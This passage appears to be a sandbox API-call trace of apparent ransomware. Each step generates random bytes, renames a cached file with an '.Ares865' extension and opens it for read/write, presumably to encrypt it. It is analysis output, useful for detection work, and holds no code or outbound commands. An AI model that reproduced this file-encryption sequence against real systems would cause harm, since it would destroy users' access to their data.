| out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.219] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.219] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.222] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.222] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.222] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.Ares865") returned 156 [0110.223] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.ares865"), dwFlags=0x1) returned 1 [0110.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.225] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=416) returned 1 [0110.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.225] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.226] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.229] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.230] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.230] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.230] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.Ares865") returned 123 [0110.230] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76.ares865"), dwFlags=0x1) returned 1 [0110.232] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.232] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=252) returned 1 [0110.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.232] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.233] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.233] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.236] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.237] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.237] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.238] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" [0110.239] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.Ares865") returned 155 [0110.239] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.ares865"), dwFlags=0x1) returned 1 [0110.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.241] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=471) returned 1 [0110.241] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.241] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.241] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.241] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.242] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.242] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.245] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.245] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.245] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.246] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.Ares865") returned 155 [0110.246] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.ares865"), dwFlags=0x1) returned 1 [0110.247] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.248] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1377) returned 1 [0110.248] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.248] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.248] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.248] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.249] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.249] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.251] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.251] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.251] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.252] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.Ares865") returned 155 [0110.252] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.ares865"), dwFlags=0x1) returned 1 [0110.253] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.253] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=472) returned 1 [0110.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.254] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.254] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.255] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.257] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.258] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.258] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.259] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.Ares865") returned 122 [0110.259] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406.ares865"), dwFlags=0x1) returned 1 [0110.261] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.261] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3869) returned 1 [0110.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.261] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.262] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.262] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.264] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.265] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.265] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.266] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.Ares865") returned 122 [0110.266] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d.ares865"), dwFlags=0x1) returned 1 [0110.267] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.267] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=325) returned 1 [0110.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.268] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.268] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.268] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.272] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.274] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.274] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.275] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.Ares865") returned 122 [0110.275] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d.ares865"), dwFlags=0x1) returned 1 [0110.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.277] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=521) returned 1 [0110.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.277] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.278] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.278] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.281] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.282] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.282] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.282] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.Ares865") returned 155 [0110.282] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.ares865"), dwFlags=0x1) returned 1 [0110.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.284] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1419) returned 1 [0110.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.284] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.285] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.285] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.287] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.288] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.288] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.289] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS 